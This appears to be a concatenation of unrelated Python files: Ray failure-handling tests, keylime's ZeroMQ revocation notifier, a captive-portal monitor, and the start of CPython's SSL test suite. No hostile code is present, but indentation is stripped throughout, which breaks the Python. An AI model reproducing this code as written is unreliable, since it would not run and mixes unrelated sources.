p = error_pubsub
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
errors = get_error_message(p, 1,
ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
# get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happeds before we subscribe it")
def test_version_mismatch(error_pubsub, shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
p = error_pubsub
errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
assert False, errors
assert len(errors) == 1
assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
p = error_pubsub
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
def test_warning_all_tasks_blocked(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(3)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_actor_waiting_on_actor(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Actor:
pass
a = Actor.remote() # noqa
b = Actor.remote() # noqa
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_task_waiting_on_actor(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Actor:
pass
a = Actor.remote() # noqa
@ray.remote(num_cpus=1)
def f():
print("f running")
time.sleep(999)
ids = [f.remote()] # noqa
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
# NOTE: We should save actor, otherwise it will be out of scope.
actor_group1 = [Foo.remote() for _ in range(num_cpus * 3)]
assert len(actor_group1) == num_cpus * 3
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
actor_group2 = [Foo.remote() for _ in range(num_cpus)]
assert len(actor_group2) == num_cpus
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote
def g(remote_waits, nested_waits):
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
# It's okey to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# It's okey to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_warning_for_dead_autoscaler(ray_start_regular, error_pubsub):
# Terminate the autoscaler process.
from ray.worker import _global_node
autoscaler_process = _global_node.all_processes[
ray_constants.PROCESS_TYPE_MONITOR][0].process
autoscaler_process.terminate()
# Confirm that we receive an autoscaler failure error.
errors = get_error_message(
error_pubsub, 1, ray_constants.MONITOR_DIED_ERROR, timeout=5)
assert len(errors) == 1
# Confirm that the autoscaler failure error is stored.
error = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
assert error is not None
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(object_ref)
thread.join()
def test_connect_with_disconnected_node(shutdown_only):
config = {
"num_heartbeats_timeout": 50,
"raylet_heartbeat_period_milliseconds": 10,
}
cluster = Cluster()
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
p = init_error_pubsub()
errors = get_error_message(p, 1, timeout=5)
assert len(errors) == 0
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
# There is no connection error to a dead node.
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
p.close()
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_system_config={"automatic_object_spilling_enabled": False})
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_period_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"ping_gcs_rpc_server_max_retries": 100
}
}],
indirect=True)
def test_gcs_server_failiure_report(ray_start_regular, log_pubsub):
p = log_pubsub
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
msg = None
cnt = 0
# wait for max 30 seconds.
while cnt < 3000 and not msg:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray.utils.decode(msg["data"]))
assert data["pid"] == "gcs_server"
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"task_retry_delay_ms": 500
}
}],
indirect=True)
def test_async_actor_task_retries(ray_start_regular):
# https://github.com/ray-project/ray/issues/11683
signal = SignalActor.remote()
@ray.remote
class DyingActor:
def __init__(self):
print("DyingActor init called")
self.should_exit = False
def set_should_exit(self):
print("DyingActor.set_should_exit called")
self.should_exit = True
async def get(self, x, wait=False):
print(f"DyingActor.get called with x={x}, wait={wait}")
if self.should_exit:
os._exit(0)
if wait:
await signal.wait.remote()
return x
# Normal in order actor task retries should work
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
assert ray.get(dying.get.remote(1)) == 1
ray.get(dying.set_should_exit.remote())
assert ray.get(dying.get.remote(42)) == 42
# Now let's try out of order retries:
# Task seqno 0 will return
# Task seqno 1 will be pending and retried later
# Task seqno 2 will return
# Task seqno 3 will crash the actor and retried later
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
# seqno 0
ref_0 = dying.get.remote(0)
assert ray.get(ref_0) == 0
# seqno 1
ref_1 = dying.get.remote(1, wait=True)
# seqno 2
ref_2 = dying.set_should_exit.remote()
assert ray.get(ref_2) is None
# seqno 3, this will crash the actor because previous task set should exit
# to true.
ref_3 = dying.get.remote(3)
# At this point the actor should be restarted. The two pending tasks
# [ref_1, ref_3] should be retried, but not the completed tasks [ref_0,
# ref_2]. Critically, if ref_2 was retried, ref_3 can never return.
ray.get(signal.send.remote())
assert ray.get(ref_1) == 1
assert ray.get(ref_3) == 3
def test_raylet_node_manager_server_failure(ray_start_cluster_head,
log_pubsub):
cluster = ray_start_cluster_head
redis_port = int(cluster.address.split(":")[1])
# Reuse redis port to make node manager grpc server fail to start.
cluster.add_node(wait=False, node_manager_port=redis_port)
p = log_pubsub
cnt = 0
# wait for max 10 seconds.
found = False
while cnt < 1000 and not found:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray.utils.decode(msg["data"]))
if data["pid"] == "raylet":
found = any("Failed to start the grpc server." in line
for line in data["lines"])
assert found
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
revocation_notifier.py
|
#!/usr/bin/env python
'''
DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
This material is based upon work supported by the Assistant Secretary of Defense for
Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or
FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this
material are those of the author(s) and do not necessarily reflect the views of the
Assistant Secretary of Defense for Research and Engineering.
Copyright 2017 Massachusetts Institute of Technology.
The software/firmware is provided to you on an As-Is basis
Delivered to the US Government with Unlimited Rights, as defined in DFARS Part
252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government
rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed
above. Use of this work other than as specifically authorized by the U.S. Government may
violate any copyrights that exist in this work.
'''
import zmq
import common
import ConfigParser
import json
import crypto
import threading
import functools
import time
import os
import sys
from multiprocessing import Process
import signal
logger = common.init_logging('revocation_notifier')
config = ConfigParser.SafeConfigParser()
config.read(common.CONFIG_FILE)
broker_proc = None
def start_broker():
def worker():
context = zmq.Context(1)
frontend = context.socket(zmq.SUB)
frontend.bind("ipc:///tmp/keylime.verifier.ipc")
frontend.setsockopt(zmq.SUBSCRIBE, "")
# Socket facing services
backend = context.socket(zmq.PUB)
backend.bind("tcp://*:%s"%config.getint('general','revocation_notifier_port'))
zmq.device(zmq.FORWARDER, frontend, backend)
global broker_proc
broker_proc = Process(target=worker)
broker_proc.start()
def stop_broker():
global broker_proc
if broker_proc is not None:
os.kill(broker_proc.pid,signal.SIGKILL)
def notify(tosend):
def worker(tosend):
context = zmq.Context()
mysock = context.socket(zmq.PUB)
mysock.connect("ipc:///tmp/keylime.verifier.ipc")
# wait 100ms for connect to happen
time.sleep(0.1)
# now send it out vi 0mq
for i in range(config.getint('cloud_verifier','max_retries')):
try:
mysock.send(json.dumps(tosend))
break
except Exception as e:
logger.debug("Unable to publish revocation message %d times, trying again in %f seconds: %s"%(i,config.getfloat('cloud_verifier','retry_interval'),e))
time.sleep(config.getfloat('cloud_verifier','retry_interval'))
mysock.close()
cb = functools.partial(worker,tosend)
t = threading.Thread(target=cb)
t.start()
cert_key=None
def await_notifications(callback,revocation_cert_path):
global cert_key
if revocation_cert_path is None:
raise Exception("must specify revocation_cert_path")
context = zmq.Context()
mysock = context.socket(zmq.SUB)
mysock.setsockopt(zmq.SUBSCRIBE, '')
mysock.connect("tcp://%s:%s"%(config.get('general','revocation_notifier_ip'),config.getint('general','revocation_notifier_port')))
logger.info('Waiting for revocation messages on 0mq %s:%s'%
(config.get('general','revocation_notifier_ip'),config.getint('general','revocation_notifier_port')))
while True:
rawbody = mysock.recv()
body = json.loads(rawbody)
if cert_key is None:
# load up the CV signing public key
if revocation_cert_path is not None and os.path.exists(revocation_cert_path):
logger.info("Lazy loading the revocation certificate from %s"%revocation_cert_path)
with open(revocation_cert_path,'r') as f:
certpem = f.read()
cert_key = crypto.rsa_import_pubkey(certpem)
if cert_key is None:
logger.warning("Unable to check signature of revocation message: %s not available"%revocation_cert_path)
elif str(body['signature'])=='none':
logger.warning("No signature on revocation message from server")
elif not crypto.rsa_verify(cert_key,str(body['msg']),str(body['signature'])):
logger.error("Invalid revocation message siganture %s"%body)
else:
message = json.loads(body['msg'])
logger.debug("Revocation signature validated for revocation: %s"%message)
callback(message)
def main():
start_broker()
import secure_mount
def worker():
def print_notification(revocation):
logger.warning("Received revocation: %s"%revocation)
keypath = '%s/unzipped/RevocationNotifier-cert.crt'%(secure_mount.mount())
await_notifications(print_notification,revocation_cert_path=keypath)
t = threading.Thread(target=worker)
t.start()
#time.sleep(0.5)
json_body2 = {
'v': 'vbaby',
'agent_id': '2094aqrea3',
'cloudagent_ip': 'ipaddy',
'cloudagent_port': '39843',
'tpm_policy': '{"ab":"1"}',
'vtpm_policy': '{"ab":"1"}',
'metadata': '{"cert_serial":"1"}',
'ima_whitelist': '{}',
'revocation_key': '',
'revocation': '{"cert_serial":"1"}',
}
print "sending notification"
notify(json_body2)
time.sleep(2)
print "shutting down"
stop_broker()
print "exiting..."
sys.exit(0)
print "done"
if __name__=="__main__":
main()
|
captive_portal.py
|
"""Detect captive portals
Regularly monitor the connection. Ignore captive portals if the connection is
behind a proxy."""
import requests
import tempfile
import threading
import time
import logging
from enum import Enum, auto
check_connection_url = 'http://captive.dividat.com/'
"""
Connection Status
The connection is either behind a proxy, or direct.
"""
class Status(Enum):
DIRECT_DISCONNECTED = auto()
DIRECT_CAPTIVE = auto()
DIRECT_CONNECTED = auto()
PROXY = auto()
def sleep(status):
if status == Status.DIRECT_DISCONNECTED or status == Status.DIRECT_CAPTIVE:
time.sleep(5)
else:
time.sleep(60)
class CaptivePortal():
def __init__(self, get_current_proxy, set_captive_portal_url):
self._status = Status.DIRECT_DISCONNECTED
self._get_current_proxy = get_current_proxy
self._set_captive_portal_url = set_captive_portal_url
def start_monitoring_daemon(self):
thread = threading.Thread(target=self._check, args=[])
thread.daemon = True
thread.start()
def is_captive(self):
return self._status == Status.DIRECT_CAPTIVE
def _check(self):
while True:
proxy = self._get_current_proxy()
if proxy is not None:
self._set_status(Status.PROXY)
else:
try:
r = requests.get(check_connection_url, allow_redirects = False)
if r.status_code == 200:
self._set_status(Status.DIRECT_CONNECTED)
elif r.status_code in [301, 302, 303, 307]:
self._set_status(Status.DIRECT_CAPTIVE)
self._set_captive_portal_url(r.headers['Location'])
else:
self._set_status(Status.DIRECT_DISCONNECTED)
except requests.exceptions.RequestException as e:
self._set_status(Status.DIRECT_DISCONNECTED)
logging.error('Connection request exception: ' + str(e))
except Exception as e:
self._set_status(Status.DIRECT_DISCONNECTED)
logging.error('Connection exception: ' + str(e))
sleep(self._status)
def _set_status(self, status):
self._status = status
if self._status != Status.DIRECT_CAPTIVE:
self._set_captive_portal_url('')
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
